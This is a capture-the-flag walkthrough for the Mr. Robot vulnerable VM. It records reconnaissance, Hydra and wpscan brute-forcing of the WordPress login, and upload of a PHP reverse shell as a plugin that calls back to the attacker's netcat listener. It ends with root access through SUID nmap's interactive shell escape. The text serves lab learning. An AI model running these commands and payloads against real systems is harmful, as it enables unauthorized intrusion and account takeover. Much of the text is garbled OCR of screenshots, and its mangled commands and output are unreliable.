Based on the show “Mr. Robot.”

    • This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
    • The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.
    • Hydra was a tool I was tasked with in using to solve this CTF. Hydra is a brute force password cracking tool. In information security. Password cracking is the methodology of guessing passwords from databases that have been stored in or are in transit within a computer system or network.

 

Discovery:

 

Use netdiscover command:

 

Currently scanning: 172.26.88.0/16 Screen View: Unique Hosts 192.168.56.100 •57:8C 192. 168.56. 104 •41:7e 5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300 192.168.2 1 At 08. 08. MAC Address •27. .27. Count 1 2 2 Len 60 120 120 MAC Vendor / Hostname Unknown vendor PCS Systemtechnik GmbH PCS Systemtechnik GmbH

 

Use Nmap:

 

We know that 192.168.56.104 is the new ip address so we can scan it using nmap:

 

nmap -sS -O -A -n 192.168.56.104:

 

 

From our initial scan, we see Ports 22, 80, and 443. Port 22 is closed while 80 and 443 are open. There is also an Apache HTTPD web server present.

 

Now I’ll switch to Nikto:

 

nikto -h 192.168.56.104

 

– Nikto v2.1.6

—————————————————————————

+ Target IP: 192.168.56.104

+ Target Hostname: 192.168.56.104

+ Target Port: 80

+ Start Time: 2019-11-03 18:10:22 (GMT-5)

—————————————————————————

+ Server: Apache

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ Retrieved x-powered-by header: PHP/5.5.29

+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)

+ Uncommon header ‘tcn’ found, with contents: list

+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.html, index.php

+ OSVDB-3092: /admin/: This might be interesting…

+ OSVDB-3092: /readme: This might be interesting…

+ Uncommon header ‘link’ found, with contents: <http://192.168.56.104/?p=23>; rel=shortlink

+ /wp-links-opml.php: This WordPress script reveals the installed version.

+ OSVDB-3092: /license.txt: License file found may identify site software.

+ /admin/index.html: Admin login page/section found.

+ Cookie wordpress_test_cookie created without the httponly flag

+ /wp-login/: Admin login page/section found.

+ /wordpress: A WordPress installation was found.

+ /wp-admin/wp-login.php: WordPress login found

+ /wordpresswp-admin/wp-login.php: WordPress login found

+ /blog/wp-login.php: WordPress login found

+ /wp-login.php: WordPress login found

+ /wordpresswp-login.php: WordPress login found

+ 7915 requests: 0 error(s) and 19 item(s) reported on remote host

+ End Time: 2019-11-03 18:16:00 (GMT-5) (338 seconds)

 

 

A few interesting things were found from our scan results.1.We see that the server is leaking inodes via ETagsin the header of /robots.txt. This relates to the CVE-2003-1418 vulnerability. These Entity Tags are an HTTP header which isused for Web cache validation and conditional requests from browsers for resources.2.Apache mod_negotiation is enabled with MultiViews, which will allow us to use a brute force attack in order to discover existing files on a server which uses mod_negotiation.3.The following alternatives for ‘index’ were found: index.html, and index.php. These can be used to provide us with more info on the website.4.OSVDB-3092: /admin/: This might be interesting… if we have a login.Good to keep that in the back of our mind.

 

/admin/index.html: Admin login page/section found -also relates to the above scan.

 

/readme.html: This WordPress file reveals the installed version.

 

Tells us this is a WordPress Site.We know we can look for WordPress Vulnerabilities.o/wp-links-opml.php: This WordPress script reveals the installed version.o/wp-login/: Admin login page/section found.o/wp-admin/wp-login.php: WordPress login found.6.OSVDB-3092: /license.txt: License filefound may identify site software. Which can help us get version information aboutplugins and services to look for exploits.That gives us our initial footprint. Access the website in our Kali browser by navigating to 192.168.56.104

 

 

Interesting website. We already know there are leaking inodes via Etags with the robots.txt. This file is to prevent crawlers from indexing portions of the website.

 

Using the Kali browser, i’m navigating to 192.168.56.104/robots.txt

 

192.168.56.104/robots.txt inux Kali Training Files User-agent: * fsocity .dic key I-of-3.txt 192.168.56.104 (robots.txt Kali Tools Kali Docs Kal

Two additional files are found and one of those is the first key. I Saved the two files using the wget command to a folder on the desktop.

 

root@kali:~# cd Desktop

root@kali:~/Desktop# mkdir mrrobot

root@kali:~/Desktop# wget http://192.168.56.104/fsocity.dic

–2019-11-03 19:05:47– http://192.168.56.104/fsocity.dic

Connecting to 192.168.56.104:80… connected.

HTTP request sent, awaiting response… 200 OK

Length: 7245381 (6.9M) [text/x-c]

Saving to: ‘fsocity.dic’

 

fsocity.dic 100%[===================>] 6.91M 20.9MB/s in 0.3s

 

2019-11-03 19:05:48 (20.9 MB/s) – ‘fsocity.dic’ saved [7245381/7245381]

 

root@kali:~/Desktop# wget http://192.168.56.104/key-1of-3.txt

–2019-11-03 19:06:32– http://192.168.56.104/key-1of-3.txt

Connecting to 192.168.56.104:80… connected.

HTTP request sent, awaiting response… 404 Not Found

2019-11-03 19:06:32 ERROR 404: Not Found.

 

root@kali:~/Desktop# wget http://192.168.56.104/key-1-of-3.txt

–2019-11-03 19:07:15– http://192.168.56.104/key-1-of-3.txt

Connecting to 192.168.56.104:80… connected.

HTTP request sent, awaiting response… 200 OK

Length: 33 [text/plain]

Saving to: ‘key-1-of-3.txt’

 

key-1-of-3.txt 100%[===================>] 33 –.-KB/s in 0s

 

2019-11-03 19:07:15 (519 KB/s) – ‘key-1-of-3.txt’ saved [33/33]

 

Creating a Mr Robot Folder on the desktop, check to contents of the files that were moved over.

 

Check the fosocity.dic file first:

 

 

Now type the following commands:

 

cd mrrobotlswc -l fsocity.dic cat fsocity.dic | sort -u | wc -lcat fsocity.dic| sort -u | uniq > Newfsocity.dic

 

This cuts the dictionary down from 858160 words to 11451 and creates shorter dictionary file named Newfsociety.dic.

 

Key #2

 

We can now go ahead and try the next two locations that we got from our scan – index.html and index.php. The .html file gets stuck with loading, so we can kill it.

 

The .php file goes back to the main page. View the source to see if there is anything interesting. This is a step that is often overlooked by the inexperienced but often the developer will leave something in the comments that can be useful to include usernames and passwords.

 

Right-click on the web page and from the context menu select View Page Source.

 

If you've come, you've come for a reason. exhausted with this world... a world that depressing bank account. Even the Internet away at your existence. There are things ns. Save Page As... Save Page to Pocket View Background Image Select All Yiew Page Source View Page Info Inspect Element (Q)

 

No help with the page source.

 

We know the site is running WordPress.

 

Navigate to 192.168.56.104/readme.html

 

No help here either. Let’s try the /license.txt file. No joy there either.

 

We can now check out the /wp-login.php/page. This is where we have to some investigating. We could open the Newfsociety.dic text file and start inputting usernames until we stop getting the invalid username error message. That would be taking a long way home. We can also use a brute force attack to find the username using the burpsuite and Hydra.

 

ERROR: Invalid username. Lost your password? username Password Remember Me Log In

 

Leave your WordPress login page up and running.

 

From your Kali browser, go to options. Under options, go to preferences.

 

New Window print P Find Developer 100% New Private Window History O Preferences Synced Tabs Save Page Full Screen Add-ons

 

From the left-hand menu, click on advanced. Under advanced click on the Network option. Under network, Open the Setting for Connection

 

Advanced General Search Content Applications Privacy Security Sync Advanced General Connection Data Choices Network Update Certificates Configure how Firefox connects to the Internet Cached Web Content Your web content cache is currently using 15.4 MB of disk space Override automatic cache management Limit cache to 350 MB of space Offline Web Content and User Data Settings... Clear Now

 

Under the proxy settings, click the radio button for the Manual proxy configuration:

 

In the text box for the HTTP proxy input the local host 127.0.0.1 and set the port to 8080. We’re using burpsuite as our proxy. Click OK

 

Minimize your browser without closing it.

 

From your Kali quick launch, open burpsuite. Accept the license agreement. Skip the update. Create a temporary project and click next.

 

Burp Suite Free Edition v1.7.27 Welcome to Burp Sulte Fræ Edition to or open a Note: D are only on Burp Suite project on disk me: Open Spide a BURPSUITE

 

Use burp defaults. Click the Start burp button.

 

Burp Suite Free Edition v1.7.27 SeQt configuration to for this B wp defaults n ved with o d file o to o Dinble BURPSUITE file...

 

 

Click on the Proxy tab and turn on Intercept.

 

Leave burb up and running and return to your WordPress login page. Type in a random username and password. Minimize your browser and return to burpsuite.

 

Burpsuite captured the attempt giving us the form fields used for the username and the password. We see that &pwd = password and log = username.

 

 

We need to identify these two form fields so that Hydra knows which two fields to use for a brute force attack on guessing the username. Once Hydra tries a valid username from the dictionary list, it will not generate an invalid username error.

 

Once we have the correct username, we can use wpscan to brute fore the password using the same dictionary list. You can close out the burpsuite.

 

Restore the proxy settings to in your Kali browser to no proxy.

 

hydra -L Newfsocity.dic -p whocares 192.168.56.104 http-form-post “/wp-login.php:log=^USER^&pwd=^PASS^:invalid”

 

The Hydra scan will take approximately 15-20 minutes so be patient.

 

Hydra returns three valid usernames all belonging to Elliot. Elliot is the main character of the Mr. Robot TV show.

 

 

Once you find the username, minimize your browser.

 

We next need to brute force the password using wpscan using the same dictionary list we created earlier

 

Run the following command from your Kali terminal.

 

wpscan –url <ip address of target> -P /root/Desktop/mrrobot/<name of file>.dic -U Elliot

WordPress version 4.3.16 (Released on 2018-04-03) Enumerating plugins from passive detection No plugins found Startin the password brute forcer [SUCCESS] Login Elliot Password ER28-0652 identified from links opml Brute Forcin 'Elliot' Time: (5630 / 11452) 49.16% I Name I Password I ETA: Id I Login I Elliot I I ER28-0652 1 Finished: mon Jun 11 2018 Requests Done: 6019 memory used: 51.848 MB Elapsed time: 00:01:38 root@kati :

 

We were able to brute force the password using the condensed dictionary list we created. The password turns out to be Elliot’s badge number.

 

We have logged onto the WordPress site.

 

Eile Edit Yiew History Bookmarks Dashboard user's Blog! x + G) P 192.168.145.134 /wp-admin/ Tools Dashboard c user's Blog' — . WordP ress Help Kali Docs XKali Tools •e Exploit-DB •Aircrack-ng üKa 5 Most Visitedv "Offensive Security XKali Linux user's Blog! 0 11 D + New Dashboard Home updates Posts Media Pages Comments Appearance Plugins Users WordPress 4.9.6 is available! Please update now. Dashboard Your browser is out of date! It looks like you're using an old version of Firefox. For the best WordPress experience, please update your browser. Update Firefox or learn how to browse happy Dismiss 4

 

Exploitation

Upon examination of the installed plugins, we find none that are vulnerable. The first thing that comes to mind to get a shell on the machine is to upload a WordPress plugin containing the appropriate PHP payload.

 

Using your Kali Browser download the following package:

 

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

 

php-reverse-shell-1.0.tar.gz

 

pentestmonkey Taking the monkey work out of pentesting Site News Categories • Blog(78) Blog Tools • Cheat Sheets (10) • Shells (1) • SQL Injection (7) • Contact (2) • Site News (3) • Tools (17) Yaptest Cheat Sheets Contact php-reverse-shell This tool IS designed for those situations during a pentest where you have upload access to a webserver that's running PHP. Upload this script to somewhere in the web root then run it by accessing the appropriate URL in your browser. The script Will open an outbound TCP connection from the webserver to a host and port of your choice. Bound to this TCP connection Will be a shell This Will be a proper interactive shell In which you can run interective programs like telnet, ssh and su. It differs from web form-based shell which allow you to send a Single command, then return you the output. Download php-reverse-shell-l.o.tar.gz

 

 

Click OK.

 

Browse to your download folder. Open the download directory.

 

DI e q Search php-reverse-shell-1.0(1).tar.gz Open downloads 8.8 KB — pentestmonkey.net — 03:22 AM Show All Downloads

 

Find your download, right click and from the context menu select Move to.

 

TGZ php- reverse- shel ta Open With Archive Manager Open With Other Application Cut Copy Move to... Copy to... Move to Trash Rename... Extract Here Extract to... Compress... Properties Return Ctrl+X Ctrl+C Delete Ctrl +1

 

Click on the Desktop and then highlight your mrrobot directory. Click on the Select button.

 

Cancel Select Move Destination Desktop Q Recent Home Desktop Documents mrrobot Name mrrobot Size Select 3 Modified 02:25

Right on the archived folder and from the context menu, select extract here. Open the extract folder.

 

php- reverse- shell-LO

 

TGZ php- reverse- shell-1.0. Open With Archive Man Open With Other Applicatic Cut Copy Move to... Copy to... Move to Trash Rename... Extract Here Extract to... Compress... Properties

 

 

Open the php-reverse-shell.php using a text editor. Right-click on the file, and from the context menu select, Open with other application.

Cancel Select Application Opening script- files. Q Select Recommended Applications Leafpad Related Applications GVim Text Editor O Vim Other Applications Archive Manager Disk Image Mounter Disk Image Writer 'Document Viewer Find New Applications

 

php- reverse- shell.php Open O en With Other Application Return

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

At the top of the php-reverse-shell.php page on the very first line, copy and paste the following text at the beginning of the line before the < (lesser than) sign.

 

You can download the header information from: http://pastebin.com/GMwhCDtm

 

php-reverse-shell.php File Edit < . php ptions Help Place the wordpress header information at the front of the < sign php- reverse-shell A Reverse Shell implementation in PHP Copyright (C) 2007 pentestmonkey@pentestmonkey . net This tool may be used for legal purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If these terms are not acceptable to you, then do not use this tool.

 

/*

Plugin Name: reverse shell

Plugin URI: https://google.com

Description: reverse shell

Version: 1

Author: reverse shell

Author URI: https://google.com

Text Domain: reverse

Domain Path: /shell

*/

 

The top of the page should now read as follows.

 

 

We next need to modify the source code to indicate where you want the reverse shell thrown back to (Your Kali machine)

 

SVERSION Sip = 192.168. 145.133 // CHANGE THIS Sport 444 Schunk_size Swrite_a null; = null; Serror a ssheu 'uname -a; Sdaemon O Sdebug o; // CHANGE THIS w; idi /bin/sh -i'

 

The $ip is the IP address of my Kali machine. We know that Kali is accustomed to using port 4444 with Metasploit so it should work here just as well.

 

Click on File, from the context menu select Save. Open the file and verify the changes are present.

 

Change the File Type to a Zip archive

 

Right-click on the newly modified php-reverse-shell.php file and from the context menu select compress. Save the archive as a zip file.

 

ZIP php- reverse- shell.zip Cancel Archive name php-reverse-shell @ .zip php- reverse- Create Archive Create o .tar.xz o Compatible with all operating systems.

 

php- reverse- shell.ph Open Open With Other Application Cut Copy Move to... Copy to... Move to Trash Rename... Compress... Properties Return Ctrl+X Ctrl+C Delete Ctrl +1

 

Catch the reverse shell

 

Open a terminal prompt and set up a listener using Netcat.

 

nc -v -n -l -p 4444

 

Leave the listener and the terminal up and running.

 

root@kali: File Edit View Search Terminal Help nc -v -n -l -p 4444

 

Upload the php-reverse-shell.php file as a plugin

 

Login to the Mr. Robot WordPress site using the username and password we discovered.

From the WordPress Dashboard, click on Plugins and then select Add New.

 

user's Blog! Dashboard Posts Media Pages Comments Appearance Plugins Oil + New WordPress 4.9.6 is available! Please update now. Plugin Add New The sel ed plugins have been deleted. (11) Inactive(ll) update Available (7) Bulk Actions Apply CA Plugin Description

 

Click on Upload Plugin

 

WordPress 4.9.6 is available! Please update now. Add Plugins

 

Click on the browse button, find your newly created zip file.

 

If you have a plugin in a . zip format, you may install it by uploading it here. Browse... No file selected. Install Now

 

¯ Desktop mrrobot php-reverse-shell-1.0 Name CHANGELOG COPYING.GPL COPYING.PHP-REVERSE-SHELL php-reverse-shell.php php-reverse-shell.zip

 

Click Install Now.

 

If you have a plugin in a . zip format, you may install it by uploading it here. Browse... php-reverse-shell.zip Install Now

 

WordPress 4.9.6 is available! Please update now. Installing Plugin from uploaded file php-reverse-shell.zip unpacking the package... Installing the plugin... Plugin installed successfully. Activate Plugin Return to Plugins page

 

Ignore the error message.

 

 

Return to the terminal running the listener.

 

If the listener is working you should see the following output:

 

root@kali: File Edit View Search Terminal Help nc -v -n -l -p 4444 listening on [any] 4444 connect to [192. 168. 145.133] from (UNKNOWN) [192.168.145.134] 39163 e o Linux Linux 3. 13.0-55-generic #94-Ubuntu SMP Thu Jun 18 UTC 2015 x86 64 x86 64 x86 64 GNU/Linux up 2:54, O users, USER FROM load average: 0.00, 0.01, LOGIN@ IDLE JCPU 0.05 PCPU WHAT uid=l (daemon) gid=l (daemon) groups—I (daemon) /bin/sh: O: can't access tty; job control turned off

 

At the prompt, we can make some more discovery by just typing in a few Linux commands.

 

Type: whoami (prints the effective username of the current user when invoked.)

Type: hostname (used to either set or display the current host, domain or node name of the system.)

Type: pwd (The pwd command reports the full path to the current directory)

Type: cd home (change directory to the home directory)

Type: ls (list the contents of the current directory)

 

We see there is another directory present called, robot. Change directory to the robot directory.

 

Type: cd robot

Type: ls

 

We have located our second key and password file that has been hashed using MD5!

 

Let’s use the cat command to read the contents of the password.raw-md5 file.

 

cat password.raw-md5

robot:c3fcd3d76192e4007dfb496cca67e13b

 

That’s not just any password. It’s the password for the robot account. We need to break the MD5 hash to see what it is.

 

root@kali: File Edit View $ whoami daemon $ hostname Linux $ pwd $ cd home robot $ cd robot Search Terminal Help REVERSI key-2-of-3.txt password . raw-md5 $ cat assword. raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b

 

There are a number of sites online that can crack an MD5 hash. To crack this hash, I am using https://www.md5online.org/

 

Copy and paste the hash into the site and click on the decrypt button.

 

MD5 Decrypter Enter your MD5 hash hera and cross your fingers Decrypt Found : abcdefghijklmnopqrstuvwxyz (hash = c3fcd3d76192ed007dfb496cca67e13b)

 

 

We have a password consisting of the alphabet. abcdefghijklmnopqrstuvwxyz

 

Save the password for later.

 

We cannot get access to the 2nd key because of a lack of permissions.

 

$ cat key-2-of-3.txt cat: key-2-of-3. txt: Permission denied

 

Using the password, we have unhashed, we can attempt to change users by trying to login using su and the robot account. No joy there either. The SU command must be run from a terminal.

 

$ su robot su: must be run from a terminal

 

We can create a terminal using python. Type the following command at the prompt:

 

python -c “import pty;pty.spawn(‘/bin/bash’);”

 

We now have a terminal and so let’s try and login using the robot account one more time. Success!

 

$ python -c "import pty;pty.spawn( ' /bin/bash')•," daemon@linux:/home/robot$ su robot su robot Password: abcdefghijklmnopqrstuvwxyz robot@linux : —$

 

We can now CAT the key-2-of-3.txt file to see its contents.

 

cat key-2-of-3.txt 822c73956184f694993bede3eb39f959 robot@linux : —$

 

Copy and save the 2nd key to your mrrobot directory as a new text file. You have now captured two of the three keys. One more to go!

 

Key #3

 

Escalating Privileges

 

Change directory to the root of the robot account.

 

cd / cd / Is

 

List the contents of robot’s home directory.

 

Is Is bin dev home bofaradaytlDE initrd robot@linux : /$ . Img lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp us r var vmlinuz

 

Nothing of major interest other than the root directory. Change over to the root directory and view the contents. No can do! Permission to access the root folder is denied.

 

Is Is bin dev home lib lost+found botaradaytlDE initrd . img lib64 media cd root cd root bash: cd: root: Permission denied robot@linux : /$ mnt opt proc root run sbin srv sys tmp us r var vmlinuz

 

Check all the file permissions on the home directory contents.

 

ls -alh

 

root@kali: e o File Edit View drwxr-xr-x drwxr-xr drwxr-xr drwxr-xr-x Search root root root root root root root root root root root root root root root root Terminal Help -x rwx rwx rwx 55-generic d rwxr -xr -x d rwxr -xr-x drwx------ d rwxr -xr-x d rwxr -xr d rwxr -xr-x dr-xr -xr -x drwx------ drwxr -xr -x d rwxr -xr-x d rwxr 3 13 77 3 1 16 2 2 2 4 3 345 3 14 2 3 root root root root root root root root root root root root root root root root 4 3 4 4 4 4 .0K . 9K . OK . OK 33 . OK . OK 16K 500 Nov Jun Jun Nov Jun Jun Jun Jun Jun Nov Sep Jun Nov Jun Nov Jun 13 13 13 13 24 24 24 24 24 13 16 13 13 13 13 24 2015 04 : 38 04 : 38 2015 2015 2015 2015 2015 2015 2015 2015 04:37 2015 04 : 38 2015 2015 boot dev etc home initrd lib lib64 . Img boot/initrd.lmg -3.13.o lost+found media mnt opt proc root run sbin srv

 

We need to get into the root folder to check the contents. We can see if the file is hiding busing the same naming convention as the other two keys using the find command. At the prompt, type the following:

 

find / -name key-3-of-3.txt

 

No joy here either! Permission denied everywhere we look. Our one remaining key file may be in this directory somewhere, so we need to find a program owned by root with the octal permissions set to 4000.

 

find / -name key-3-of find / -name key-3-of-3.txt find: /etc/ssl/private' : Permission '/root'• find:. Permission denied -3. txt denied Permission denied find: find: find: find: find: find: find: find: find: find: find: /opt/bitnami/mysql/data/bitnami wordpress' : Permission denied /opt/bitnami/mysql/data/performance schema' : Permission denied /opt/bitnami/var/data' : Permission denied /opt/bitnami/apps/wordpress/htdocs' : Permission denied /var/lib/monit/events' : Permission denied /var/lib/sudo' : Permission denied /var/cache/ldconfig' • Permission denied /var/spool/rsyslog' • Permission denied /var/spool/cron/crontabs' : Permission denied /sys/kernel/debug' • Permission denied /lost+found' : Permission denied

 

Again, with the find command.

 

find / -perm -4000 -type f 2>/dev/null

 

We find that Nmap is running on the system with root access.

 

 

e File Edit View Search Terminal erlc find / -perm root@kali: Help -4000 -type f 2>/dev/null o find / -perm -4000 -type f 2>/dev/null /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /vmware- tools/bin32/vmware-user-suid-wrapper /usc/ 1b/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt chown

 

At the prompt type: nmap -help

 

 

 

The older versions of Nmap had an interactive mode.

 

At the prompt type: nmap –interactive

 

At the next prompt, type: h for help.

 

 

At the nmap prompt type: !sh to get a shell

 

Type in: whoami

 

You are root! You can now cd to the root directory and list the contents.

 

 

nmap> ! sh ! sh # whoami whoami root # cd root cd root # Is Is firstboot done key-3-of-3.txt

 

There is your third and final key.

 

CAT the contents of the key to the terminal.

 

 

firstboot done key-3-of-3. txt # cat key-3-of-3.txt cat ke -3-of-3.txt 4787ddef27c3dee1ee161b21670b4e4

 

Save the key to your mrrobot folder,

 

Summary

 

All I can say is wow! Doing a CTF exercise is a great way to hone your skills. Regardless of the outcome, you will leave as a better pentester or hacker. This first CTF took a week of research and much trial and error to build. I choose what I thought were the best ways to complete the requirements and there were plenty of different ways of getting the same result.

 

A lot of my research showed Metasploit exploits being used to establish a Meterpreter session with the WordPress site, but I could never get the payload to work.

 

Much of what you will have learned will be seen again in future CFT labs as a lot of the steps are used repeatedly.

 

CTF’s are a great way to bring all of what you have learned together.

 

I encourage you to do this CTF three or four times until you become comfortable with the hacking methodology and the steps we used in the lab.

 

 

Addition resources used in this CTF walkthrough.

 

https://github.com/pentestmonkey/php-…

http://pastebin.com/GMwhCDtm

http://www.rebootuser.com/?p=1623#.V5…

Snooze Security

DOWNLOAD Walkthrough